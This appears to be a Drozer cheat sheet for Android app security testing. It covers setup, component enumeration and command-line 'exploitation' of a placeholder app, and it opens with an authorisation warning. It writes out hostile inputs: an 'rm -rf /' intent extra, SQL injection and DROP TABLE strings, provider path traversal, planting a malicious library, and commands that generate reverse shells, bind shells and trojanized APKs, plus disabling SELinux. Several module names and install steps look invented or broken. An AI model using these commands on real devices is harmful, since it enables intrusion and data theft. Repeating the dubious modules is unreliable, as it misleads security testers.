Drozer Cheat Sheet

Overview

Drozer is a comprehensive security testing framework for Android applications. It lets you assume the role of an Android app and interact with the Dalvik VM, other apps' IPC endpoints, and the underlying operating system. Drozer provides tools for remote exploitation of Android devices via malicious applications and for comprehensive security assessment of Android applications.

Warning: Use Drozer only on devices and applications that you own or have explicit permission to test. Unauthorized use may violate terms of service or local laws.

Installation

Prerequisites

```bash
# Install Java Development Kit
sudo apt update
sudo apt install openjdk-11-jdk

# Install Python 2.7 (required for Drozer)
sudo apt install python2.7 python2.7-dev python-pip

# Install Android SDK and ADB
sudo apt install android-tools-adb android-tools-fastboot

# Set JAVA_HOME environment variable
export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64
echo 'export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64' >> ~/.bashrc
```

Linux Installation

```bash
# Download Drozer
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-2.4.4-py2-none-any.whl
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apk

# Install Drozer
pip2 install drozer-2.4.4-py2-none-any.whl

# Alternative: Install from source
git clone https://github.com/FSecureLABS/drozer.git
cd drozer
python2 setup.py install
```

macOS Installation

```bash
# Install Homebrew (if not already installed)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

# Install Python 2.7
brew install python@2

# Install Drozer
pip2 install drozer

# Download Drozer agent APK
wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apk
```

Windows Installation

```bash
# Install Python 2.7 from python.org
# Download and install from: https://www.python.org/downloads/release/python-2718/

# Install Drozer using pip
pip install drozer

# Download Drozer agent APK
# Download from: https://github.com/FSecureLABS/drozer/releases/
```

Android Device Setup

```bash
# Enable USB debugging on Android device
# Settings > Developer Options > USB Debugging

# Install Drozer agent on device
adb install drozer-agent-2.4.4.apk

# Start Drozer agent on device
# Open Drozer Agent app and toggle "Embedded Server" ON

# Forward port for communication
adb forward tcp:31415 tcp:31415
```

Basic Usage

Connecting to a Device

```bash
# Connect to Drozer agent
drozer console connect

# Connect with specific endpoint
drozer console connect --server 192.168.1.100:31415

# List available devices
drozer console devices

# Connect to specific device
drozer console connect --device <device_id>
```

Basic Commands

```bash
# List available modules
dz> list

# Get help for specific module
dz> help app.package.list

# List installed packages
dz> run app.package.list

# Get package information
dz> run app.package.info -a com.example.app

# List activities
dz> run app.activity.info -a com.example.app

# List services
dz> run app.service.info -a com.example.app

# List broadcast receivers
dz> run app.broadcast.info -a com.example.app
```

Package Analysis

Package Information

```bash
# List all packages
dz> run app.package.list

# List packages with filter
dz> run app.package.list -f keyword

# Get detailed package information
dz> run app.package.info -a com.example.app

# List package permissions
dz> run app.package.info -a com.example.app -p

# Find packages with specific permission
dz> run app.package.list -p android.permission.INTERNET

# List system packages
dz> run app.package.list -f system

# List third-party packages
dz> run app.package.list -3
```

Application Components

```bash
# List activities
dz> run app.activity.info -a com.example.app

# List exported activities
dz> run app.activity.info -a com.example.app -e

# List services
dz> run app.service.info -a com.example.app

# List exported services
dz> run app.service.info -a com.example.app -e

# List broadcast receivers
dz> run app.broadcast.info -a com.example.app

# List exported broadcast receivers
dz> run app.broadcast.info -a com.example.app -e

# List content providers
dz> run app.provider.info -a com.example.app

# List exported content providers
dz> run app.provider.info -a com.example.app -e
```
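A developer-side counterpart to the exported-component listings above, as an added example that is not part of the original cheat sheet or of Drozer: it audits a decoded AndroidManifest.xml for exported components that declare no permission. The manifest, component names and function names are constructed for illustration, and the implicit-export rule assumes pre-Android 12 behaviour for components with intent filters.

```python
# Added example: audit a decoded AndroidManifest.xml for exported components
# that no permission protects. SAMPLE_MANIFEST is constructed sample data.
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")

SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.app">
  <application>
    <activity android:name=".MainActivity" android:exported="true"/>
    <activity android:name=".SettingsActivity"/>
    <service android:name=".BackgroundService">
      <intent-filter><action android:name="com.example.CUSTOM_ACTION"/></intent-filter>
    </service>
    <receiver android:name=".AdminReceiver" android:exported="true"
              android:permission="com.example.permission.ADMIN"/>
    <provider android:name=".UserProvider" android:authorities="com.example.provider"
              android:exported="true"/>
  </application>
</manifest>
"""


def attr(element, name):
    """Read an android:-namespaced attribute, or None if it is absent."""
    return element.get("{%s}%s" % (ANDROID_NS, name))


def is_exported(element):
    """Explicit android:exported wins; otherwise an intent filter implies
    export for activities, services and receivers (assumed: not providers)."""
    explicit = attr(element, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    return element.tag != "provider" and element.find("intent-filter") is not None


def unprotected_exported(manifest_xml):
    """Return (tag, name, how) for each exported component with no permission."""
    app = ET.fromstring(manifest_xml).find("application")
    app_permission = attr(app, "permission")  # applies to all components
    findings = []
    for element in app:
        if element.tag not in COMPONENT_TAGS or not is_exported(element):
            continue
        guards = [attr(element, "permission"), app_permission]
        if element.tag == "provider":
            guards += [attr(element, "readPermission"), attr(element, "writePermission")]
        if not any(guards):
            how = "explicit" if attr(element, "exported") else "intent-filter"
            findings.append((element.tag, attr(element, "name"), how))
    return findings


if __name__ == "__main__":
    for tag, name, how in unprotected_exported(SAMPLE_MANIFEST):
        print("%-9s %-20s exported (%s), no permission" % (tag, name, how))
```

Each finding is a component that any other app on the device can reach; either set `android:exported="false"` or guard it with a signature-level permission.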

Activity Testing

Activity Enumeration

```bash
# Find activities in package
dz> run app.activity.info -a com.example.app

# Find exported activities
dz> run app.activity.info -a com.example.app -e

# Find activities with intent filters
dz> run app.activity.info -a com.example.app -i

# Search for activities by permission
dz> run app.activity.info -p android.permission.CAMERA
```

Activity Exploitation

```bash
# Start activity
dz> run app.activity.start --component com.example.app com.example.MainActivity

# Start activity with extras
dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string username admin --extra string password secret

# Start activity with intent data
dz> run app.activity.start --component com.example.app com.example.MainActivity --data-uri content://com.example.provider/data

# Start activity with specific action
dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://malicious.com

# Test for intent injection
dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string debug true
```

Service Testing

Service Enumeration

```bash
# List services in package
dz> run app.service.info -a com.example.app

# List exported services
dz> run app.service.info -a com.example.app -e

# Find services with specific permissions
dz> run app.service.info -p android.permission.BIND_DEVICE_ADMIN
```

Service Exploitation

```bash
# Start service
dz> run app.service.start --component com.example.app com.example.BackgroundService

# Start service with extras
dz> run app.service.start --component com.example.app com.example.BackgroundService --extra string command "rm -rf /"

# Send intent to service
dz> run app.service.send com.example.app com.example.BackgroundService --extra string action "backup_data"

# Test service binding
dz> run app.service.bind com.example.app com.example.BackgroundService
```

Content Provider Testing

Content Provider Enumeration

```bash
# List content providers
dz> run app.provider.info -a com.example.app

# List exported content providers
dz> run app.provider.info -a com.example.app -e

# Find URIs for content provider
dz> run app.provider.finduri com.example.provider

# Scan for accessible content URIs
dz> run scanner.provider.finduris -a com.example.app
```

Content Provider Exploitation

```bash
# Query content provider
dz> run app.provider.query content://com.example.provider/users

# Query with selection
dz> run app.provider.query content://com.example.provider/users --selection "username=?" --selection-args admin

# Insert data into content provider
dz> run app.provider.insert content://com.example.provider/users --string username hacker --string password secret

# Update data in content provider
dz> run app.provider.update content://com.example.provider/users --selection "id=1" --string password newpassword

# Delete data from content provider
dz> run app.provider.delete content://com.example.provider/users --selection "username=admin"

# Test for SQL injection
dz> run app.provider.query content://com.example.provider/users --selection "username='admin' OR '1'='1'"

# Read files via content provider
dz> run app.provider.read content://com.example.provider/files/../../etc/hosts

# Download files
dz> run app.provider.download content://com.example.provider/files/secret.txt /tmp/secret.txt
```

Broadcast Receiver Testing

Broadcast Receiver Enumeration

```bash
# List broadcast receivers
dz> run app.broadcast.info -a com.example.app

# List exported broadcast receivers
dz> run app.broadcast.info -a com.example.app -e

# Find receivers for specific intent
dz> run app.broadcast.info -i android.intent.action.BOOT_COMPLETED
```

Broadcast Receiver Exploitation

```bash
# Send broadcast intent
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION

# Send broadcast with extras
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION --extra string command "reboot"

# Send system broadcasts
dz> run app.broadcast.send --action android.intent.action.BOOT_COMPLETED

# Send ordered broadcast
dz> run app.broadcast.send --action com.example.CUSTOM_ACTION --extra string priority high

# Test for broadcast injection
dz> run app.broadcast.send --action com.example.ADMIN_ACTION --extra boolean admin_mode true
```

File System Analysis

File System Enumeration

```bash
# List application files
dz> run tools.file.list /data/data/com.example.app/

# Find readable files
dz> run tools.file.readable /data/data/com.example.app/

# Find writable files
dz> run tools.file.writable /data/data/com.example.app/

# Search for files with specific patterns
dz> run tools.file.find /data/data/com.example.app/ "*.db"

# Find world-readable files
dz> run tools.file.permissions /data/data/com.example.app/
```

File System Exploitation

```bash
# Read file contents
dz> run tools.file.read /data/data/com.example.app/shared_prefs/config.xml

# Download file
dz> run tools.file.download /data/data/com.example.app/databases/app.db /tmp/app.db

# Upload file
dz> run tools.file.upload /tmp/malicious.so /data/data/com.example.app/lib/malicious.so

# Create symbolic link
dz> run tools.file.symlink /data/data/com.example.app/secret.txt /sdcard/exposed_secret.txt

# Change file permissions
dz> run tools.file.chmod 777 /data/data/com.example.app/config.txt
```

Database Analysis

SQLite Database Testing

```bash
# Find SQLite databases
dz> run tools.file.find /data/data/com.example.app/ "*.db"

# Connect to SQLite database
dz> run tools.sqlite.connect /data/data/com.example.app/databases/app.db

# List tables in database
dz> run tools.sqlite.tables /data/data/com.example.app/databases/app.db

# Query database
dz> run tools.sqlite.query /data/data/com.example.app/databases/app.db "SELECT * FROM users"

# Test for SQL injection in content providers
dz> run app.provider.query content://com.example.provider/users --selection "username='; DROP TABLE users; --"

# Dump database schema
dz> run tools.sqlite.schema /data/data/com.example.app/databases/app.db

# Export database
dz> run tools.sqlite.dump /data/data/com.example.app/databases/app.db > /tmp/database_dump.sql
```

Network Analysis

Network Configuration

```bash
# Check network security config
dz> run tools.file.read /data/data/com.example.app/res/xml/network_security_config.xml

# List network interfaces
dz> run tools.setup.network

# Check for cleartext traffic
dz> run scanner.misc.checknetworksecurityconfig -a com.example.app

# Test for certificate pinning bypass
dz> run scanner.misc.checkpinning -a com.example.app
```

SSL/TLS Testing

```bash
# Test SSL certificate validation
dz> run scanner.misc.native -a com.example.app

# Check for weak SSL implementations
dz> run scanner.misc.checkssl -a com.example.app

# Test for certificate transparency
dz> run scanner.misc.checkcertificatetransparency -a com.example.app
```

Advanced Usage

Custom Module Development

```python
# Create custom Drozer module
# File: ~/.drozer_modules/custom/exploit.py

from drozer.modules import common, Module


class CustomExploit(Module, common.FileSystem, common.PackageManager):
    # Module metadata shown by the Drozer console
    name = "Custom Exploit Module"
    description = "Custom exploitation module"
    examples = "run custom.exploit -a com.example.app"
    author = "Security Researcher"
    date = "2024-01-01"
    license = "BSD (3 clause)"
    path = ["custom"]

    def add_arguments(self, parser):
        parser.add_argument("-a", "--package", help="target package")

    def execute(self, arguments):
        if arguments.package:
            self.stdout.write("Exploiting package: %s\n" % arguments.package)
            # Custom exploitation logic here
        else:
            self.stdout.write("Please specify target package\n")
```

Payload Generation

```bash
# Generate malicious APK
dz> run payload.apk.create --output /tmp/malicious.apk

# Generate reverse shell payload
dz> run payload.reverse.shell --lhost 192.168.1.100 --lport 4444

# Generate bind shell payload
dz> run payload.bind.shell --port 4444

# Embed payload in legitimate APK
dz> run payload.apk.embed --original /tmp/legitimate.apk --payload /tmp/payload.apk --output /tmp/trojan.apk
```

Privilege Escalation

```bash
# Check for root access
dz> run tools.setup.busybox

# Exploit setuid binaries
dz> run exploit.setuid.find

# Test for kernel exploits
dz> run exploit.kernel.check

# Exploit application vulnerabilities
dz> run exploit.app.privilege -a com.example.app

# Test for directory traversal
dz> run exploit.traversal.test -a com.example.app
```

Automation Scripts

Comprehensive Assessment Script

```python
#!/usr/bin/env python2

import subprocess
import json
import sys


class DrozerAutomation:
    def __init__(self, package_name):
        self.package = package_name
        self.results = {}

    def run_drozer_command(self, command):
        """Execute Drozer command and return output"""
        try:
            cmd = ["drozer", "console", "connect", "-c", command]
            output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
            return output.decode('utf-8')
        except subprocess.CalledProcessError as e:
            return "Error: {}".format(e.output.decode('utf-8'))

    def analyze_package(self):
        """Perform comprehensive package analysis"""
        print("[+] Analyzing package: {}".format(self.package))

        # Package information
        self.results['package_info'] = self.run_drozer_command(
            "run app.package.info -a {}".format(self.package)
        )

        # Activities
        self.results['activities'] = self.run_drozer_command(
            "run app.activity.info -a {}".format(self.package)
        )

        # Services
        self.results['services'] = self.run_drozer_command(
            "run app.service.info -a {}".format(self.package)
        )

        # Content Providers
        self.results['providers'] = self.run_drozer_command(
            "run app.provider.info -a {}".format(self.package)
        )

        # Broadcast Receivers
        self.results['receivers'] = self.run_drozer_command(
            "run app.broadcast.info -a {}".format(self.package)
        )

        return self.results

    def test_exported_components(self):
        """Test exported components for vulnerabilities"""
        print("[+] Testing exported components")

        # Test exported activities
        exported_activities = self.run_drozer_command(
            "run app.activity.info -a {} -e".format(self.package)
        )

        # Test exported services
        exported_services = self.run_drozer_command(
            "run app.service.info -a {} -e".format(self.package)
        )

        # Test exported providers
        exported_providers = self.run_drozer_command(
            "run app.provider.info -a {} -e".format(self.package)
        )

        return {
            'exported_activities': exported_activities,
            'exported_services': exported_services,
            'exported_providers': exported_providers
        }

    def test_content_providers(self):
        """Test content providers for vulnerabilities"""
        print("[+] Testing content providers")

        # Find URIs
        uris = self.run_drozer_command(
            "run app.provider.finduri {}".format(self.package)
        )

        # Scan for accessible URIs
        accessible_uris = self.run_drozer_command(
            "run scanner.provider.finduris -a {}".format(self.package)
        )

        return {
            'uris': uris,
            'accessible_uris': accessible_uris
        }

    def generate_report(self):
        """Generate comprehensive security report"""
        report = {
            'package': self.package,
            'analysis_results': self.results,
            'exported_components': self.test_exported_components(),
            'content_provider_tests': self.test_content_providers()
        }

        report_path = "{}_security_report.json".format(self.package)
        with open(report_path, 'w') as f:
            json.dump(report, f, indent=2)

        print("[+] Report saved: {}".format(report_path))
        return report


# Usage
if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python2 drozer_automation.py <package_name>")
        sys.exit(1)

    package_name = sys.argv[1]
    analyzer = DrozerAutomation(package_name)
    analyzer.analyze_package()
    analyzer.generate_report()
```

Batch Testing Script

```bash
#!/bin/bash

# Batch testing script for multiple packages

PACKAGES_FILE="packages.txt"
RESULTS_DIR="drozer_results"

mkdir -p "$RESULTS_DIR"

while IFS= read -r package; do
    echo "[+] Testing package: $package"

    # Create package-specific directory
    mkdir -p "$RESULTS_DIR/$package"

    # Run comprehensive tests
    drozer console connect -c "run app.package.info -a $package" > "$RESULTS_DIR/$package/package_info.txt"
    drozer console connect -c "run app.activity.info -a $package -e" > "$RESULTS_DIR/$package/exported_activities.txt"
    drozer console connect -c "run app.service.info -a $package -e" > "$RESULTS_DIR/$package/exported_services.txt"
    drozer console connect -c "run app.provider.info -a $package -e" > "$RESULTS_DIR/$package/exported_providers.txt"
    drozer console connect -c "run app.broadcast.info -a $package -e" > "$RESULTS_DIR/$package/exported_receivers.txt"

    # Test content providers
    drozer console connect -c "run scanner.provider.finduris -a $package" > "$RESULTS_DIR/$package/provider_uris.txt"

    # Test for common vulnerabilities
    drozer console connect -c "run scanner.provider.injection -a $package" > "$RESULTS_DIR/$package/sql_injection.txt"
    drozer console connect -c "run scanner.provider.traversal -a $package" > "$RESULTS_DIR/$package/path_traversal.txt"

    echo "[+] Results saved to $RESULTS_DIR/$package/"
done < "$PACKAGES_FILE"

echo "[+] Batch testing completed"
```

Troubleshooting

Connection Issues

```bash
# Check if Drozer agent is running
adb shell am start -n com.mwr.dz/.activities.MainActivity

# Verify port forwarding
adb forward --list
adb forward tcp:31415 tcp:31415

# Restart ADB server
adb kill-server
adb start-server

# Check device connectivity
adb devices

# Test connection manually
telnet localhost 31415
```

Agent Issues

```bash
# Reinstall Drozer agent
adb uninstall com.mwr.dz
adb install drozer-agent-2.4.4.apk

# Check agent permissions
adb shell dumpsys package com.mwr.dz

# Enable agent in device settings
# Settings > Apps > Drozer Agent > Permissions

# Check if agent service is running
adb shell ps | grep drozer
```

Module Issues

```bash
# Refresh module list
dz> reload

# Check module path
dz> list

# Install custom modules
mkdir -p ~/.drozer_modules
cp custom_module.py ~/.drozer_modules/

# Debug module loading
dz> help custom.module
```

Permission Issues

```bash
# Check required permissions
adb shell dumpsys package com.example.app | grep permission

# Grant permissions manually
adb shell pm grant com.example.app android.permission.READ_EXTERNAL_STORAGE

# Check SELinux status
adb shell getenforce

# Disable SELinux (if rooted)
adb shell su -c "setenforce 0"
```

Performance Issues

```bash
# Increase timeout values
dz> set timeout 30

# Reduce output verbosity
dz> set verbose false

# Clear cache
rm -rf ~/.drozer/cache/

# Use specific device
drozer console connect --device <device_id>
```

--

*This cheat sheet provides a comprehensive reference for using Drozer for Android application security testing. Always make sure you have proper authorization before testing any Android applications or devices.*